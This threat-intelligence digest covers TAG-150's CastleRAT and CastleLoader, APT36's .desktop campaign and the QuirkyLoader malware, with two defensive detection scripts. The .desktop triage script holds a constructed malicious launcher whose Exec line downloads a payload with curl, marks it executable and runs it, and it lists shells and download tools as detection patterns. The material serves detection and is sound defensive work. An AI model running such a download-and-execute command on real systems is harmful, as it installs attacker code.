
TAG-150 Develops CastleRAT in Python and C for Expanded Malware Operations

2 unique sources, 2 articles

Summary


TAG-150, the threat actor behind the CastleLoader malware-as-a-service (MaaS) framework, has developed a new remote access trojan (RAT) named CastleRAT. It exists in both Python and C variants; both collect system information, execute commands, and download additional payloads, and the C variant adds keylogging, screenshot capture, and cryptocurrency clipping (rewriting wallet addresses on the clipboard). TAG-150 has been active since at least March 2025, using CastleLoader to deliver a range of secondary payloads, including other RATs, information stealers, and loaders. Infections begin with phishing attacks and fraudulent GitHub repositories.

CastleRAT sits within a multi-tiered infrastructure and uses Steam Community profiles as dead drop resolvers: the implant retrieves its command-and-control (C2) server address from a profile page rather than carrying it hard-coded, so operators can rotate servers without redeploying the malware.

Recent related findings include TinyLoader, TinkyWinkey, and Inf0s3c Stealer, which are used to deliver further malware and steal information. CastleLoader has been linked to a Play ransomware attack against a French organization. TAG-150 appears to serve a small, sophisticated user base and likely promotes its services within closed circles.
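The dead-drop-resolver behaviour described in the summary is also a detection opportunity: a workstation that fetches a Steam Community profile page and, seconds later, opens a connection to a bare IP address is unusual for ordinary Steam use. The sketch below is an added example written for this page, not code from the report or from TAG-150. The log format, the 120-second pairing window, the RFC 1918 exclusion and the inclusion of /id/ vanity profile URLs are assumptions, and the log lines are constructed for illustration (documentation-range addresses stand in for public IPs).

```python
"""Pair Steam Community profile fetches with follow-on connections to bare IPs.

Added example with constructed proxy-style log lines; the format is assumed:
    <ISO-8601 UTC timestamp> <source host> <method> <URL or host:port>
"""
from __future__ import annotations

import ipaddress
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log lines, not real telemetry.
SAMPLE_LOGS = """\
2025-09-05T10:00:01Z WS-042 GET https://steamcommunity.com/profiles/76561198000000001
2025-09-05T10:00:03Z WS-042 CONNECT 203.0.113.45:443
2025-09-05T10:00:05Z WS-042 GET https://www.example.com/index.html
2025-09-05T10:02:00Z WS-017 GET https://steamcommunity.com/profiles/76561198000000002
2025-09-05T10:09:30Z WS-017 CONNECT 198.51.100.7:8080
2025-09-05T10:03:00Z WS-099 GET https://store.steampowered.com/app/730
2025-09-05T10:03:01Z WS-099 CONNECT 192.0.2.10:443
2025-09-05T10:04:00Z WS-042 GET https://steamcommunity.com/profiles/76561198000000003
2025-09-05T10:04:02Z WS-042 CONNECT 10.20.30.40:443
"""

# /profiles/ is the location named in the reporting; /id/ vanity URLs are an assumption.
PROFILE_RE = re.compile(r"^https?://steamcommunity\.com/(?:profiles|id)/[^/?#]+", re.I)
# A CONNECT target written as a dotted-quad literal, optionally with a port.
BARE_IP_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})(?::\d{1,5})?$")
# Internal ranges excluded to cut noise; kept explicit because ipaddress.is_private also
# covers the documentation ranges used in the sample.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_line(line: str):
    ts, host, method, target = line.split(maxsplit=3)
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), host, method, target


def is_internal(ip_text: str) -> bool:
    ip = ipaddress.ip_address(ip_text)
    return any(ip in net for net in RFC1918)


def find_dead_drop_candidates(log_text: str, window_s: int = 120) -> list[dict]:
    """One alert per host whose profile fetch is followed within window_s seconds
    by a CONNECT to a bare, non-RFC1918 IP literal."""
    per_host: dict[str, list] = defaultdict(list)
    for raw in log_text.splitlines():
        if raw.strip():
            ts, host, method, target = parse_line(raw)
            per_host[host].append((ts, method, target))

    alerts = []
    for host, events in per_host.items():
        events.sort()  # logs may arrive out of order; pair in time order
        pending = None  # most recent profile fetch not yet paired with a CONNECT
        for ts, method, target in events:
            if PROFILE_RE.match(target):
                pending = (ts, target)
                continue
            m = BARE_IP_RE.match(target)
            if pending and method == "CONNECT" and m and not is_internal(m.group(1)):
                delta = (ts - pending[0]).total_seconds()
                if delta <= window_s:
                    alerts.append({"host": host, "profile": pending[1],
                                   "dst": m.group(1), "seconds_after": delta})
                    pending = None
    return alerts


if __name__ == "__main__":
    for alert in find_dead_drop_candidates(SAMPLE_LOGS):
        print(alert)
```

With the default window only WS-042 fires (profile fetch, then a CONNECT to 203.0.113.45 two seconds later); WS-017's connection comes seven and a half minutes after its profile fetch and is dropped unless the window is widened, and WS-099 never touched a profile page. Tune the window against your own baseline before deploying anything like this.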

Timeline

  1. 05.09.2025 17:07 · 2 articles

    TAG-150 Develops CastleRAT in Python and C

    TAG-150 has been active since at least March 2025, and CastleLoader has been used in over 1,600 attacks, resulting in nearly 470 successful infections. Targets include critical infrastructure and a significant number of U.S. government agencies, and CastleLoader has been linked to a Play ransomware attack against a French organization. The C variant of CastleRAT includes a clipper, a keylogger, a screen capturer, and the ability to terminate browser processes. The Python variant, tracked as PyNightshade, uses UAC prompt bombing (repeatedly raising User Account Control elevation prompts until the user clicks through) to bypass security protections and evade sandbox solutions. The reporting also describes TAG-150's small, sophisticated user base, operating within closed circles, and anticipates further malware development and distribution by the group.



Similar Happenings

Transparent Tribe Targets Indian Government with Dual-Platform Malware Campaign

APT36, also known as Transparent Tribe, is targeting both Windows and BOSS Linux systems in ongoing attacks against Indian government and defense entities. The campaign, active since August 1, 2025, involves phishing emails delivering malicious .desktop files disguised as PDFs. The malware facilitates data exfiltration, persistent espionage access, and includes anti-debugging and anti-sandbox checks. The malware also targets the Kavach 2FA solution used by Indian government agencies. The attack leverages the .desktop file's 'Exec=' field to execute a sequence of shell commands that download and run a Go-based ELF payload. The payload establishes persistence through cron jobs and systemd services, and communicates with a C2 server via a WebSocket channel. The technique allows APT36 to evade detection by abusing a legitimate Linux feature that is not typically monitored for threats. The campaign demonstrates APT36's evolving tactics, becoming more evasive and sophisticated.
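Because the .desktop abuse described above is a file-format trick, a static triage check is straightforward. The script below is an added example written for this page, not APT36's file or a published detection: it parses the [Desktop Entry] group and flags Exec= values that wrap a shell, fetch from a URL, chain commands, mark a file executable, or sit behind a document-like Name/Icon with Terminal=false so no console appears. The three sample launchers are constructed (documentation-range IP), and the shell, downloader and viewer lists are assumptions to adjust for your environment.

```python
"""Static triage of Linux .desktop launchers (added example; constructed samples)."""
import re

# Assumed tool lists: shells that take a command string, fetch tools, document viewers.
SHELLS = {"sh", "bash", "dash", "zsh"}
DOWNLOADERS = {"curl", "wget"}
DOC_VIEWERS = {"evince", "okular", "xdg-open", "libreoffice", "atril", "zathura"}

# Constructed sample: a launcher posing as a PDF that runs a download-and-execute pipeline.
MALICIOUS_DESKTOP = """\
[Desktop Entry]
Type=Application
Name=Meeting_Notice.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s http://198.51.100.9/x -o /tmp/.x; chmod +x /tmp/.x; nohup /tmp/.x &"
"""

# Constructed sample: an ordinary application launcher.
BENIGN_DESKTOP = """\
[Desktop Entry]
Type=Application
Name=Firefox
Exec=/usr/bin/firefox %u
Icon=firefox
Terminal=false
"""

# Constructed sample: a legitimate shortcut to a document, opened by a real viewer.
PDF_SHORTCUT = """\
[Desktop Entry]
Type=Application
Name=Manual.pdf
Icon=application-pdf
Exec=evince /home/user/Manual.pdf
"""


def parse_desktop(text: str) -> dict:
    """Return the key=value pairs of the [Desktop Entry] group; other groups are ignored."""
    entry, in_entry = {}, False
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if s.startswith("[") and s.endswith("]"):
            in_entry = s == "[Desktop Entry]"
            continue
        if in_entry and "=" in s:
            key, value = s.split("=", 1)
            entry[key.strip()] = value.strip()
    return entry


def triage_desktop(text: str) -> list:
    """Return finding tags for one .desktop file; an empty list means nothing was flagged."""
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    # Every word-like token in Exec reduced to its basename, so /usr/bin/curl and curl match alike.
    tokens = {t.rsplit("/", 1)[-1] for t in re.findall(r"[A-Za-z0-9_./-]+", exec_line)}
    findings = []
    if tokens & SHELLS and "-c" in tokens:
        findings.append("shell-wrapper")       # sh/bash -c "<pipeline>"
    if tokens & DOWNLOADERS:
        findings.append("downloader")          # curl/wget inside a launcher
    if re.search(r";|&&|\|\||\|", exec_line):
        findings.append("chained-commands")    # several commands in one Exec line
    if re.search(r"\bchmod\b[^;&|]*\+x", exec_line):
        findings.append("chmod-exec")          # makes a dropped file executable
    if re.search(r"\b(?:https?|ftp)://", exec_line):
        findings.append("remote-url")          # payload fetched from the network
    name, icon = entry.get("Name", ""), entry.get("Icon", "").lower()
    looks_like_document = bool(re.search(r"\.(?:pdf|docx?|xlsx?|pptx?)$", name, re.I)) or "pdf" in icon
    if looks_like_document and not (tokens & DOC_VIEWERS):
        findings.append("document-disguise")   # named like a document, but no viewer is run
    if "shell-wrapper" in findings and entry.get("Terminal", "").lower() == "false":
        findings.append("hidden-console")      # shell pipeline with the terminal suppressed
    return findings


if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_DESKTOP), ("benign", BENIGN_DESKTOP), ("pdf shortcut", PDF_SHORTCUT)):
        print(label, triage_desktop(sample))
```

The PDF_SHORTCUT sample is the false-positive case worth keeping in mind: a document-like name alone is not suspicious when Exec hands the file to a known viewer, which is why the document-disguise check is conditioned on the absence of a viewer rather than on the name alone.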

QuirkyLoader Malware Distributes Multiple Payloads via Email Spam Campaigns

A new malware loader, QuirkyLoader, has been observed in email spam campaigns since November 2024. It delivers various payloads, including Agent Tesla, AsyncRAT, and Snake Keylogger, and uses DLL side-loading and process hollowing to inject them into legitimate processes. Two recent campaigns targeted Taiwan and Mexico: the Taiwanese campaign focused on specific organizations, while the Mexican one produced indiscriminate infections. The loader employs evasion tactics such as .NET AOT compilation, which yields native code that is harder to decompile than ordinary .NET assemblies, and has been used in limited campaigns since July 2025. Separately, new phishing trends, including QR code phishing and precision-validated phishing, highlight the evolving tactics of threat actors.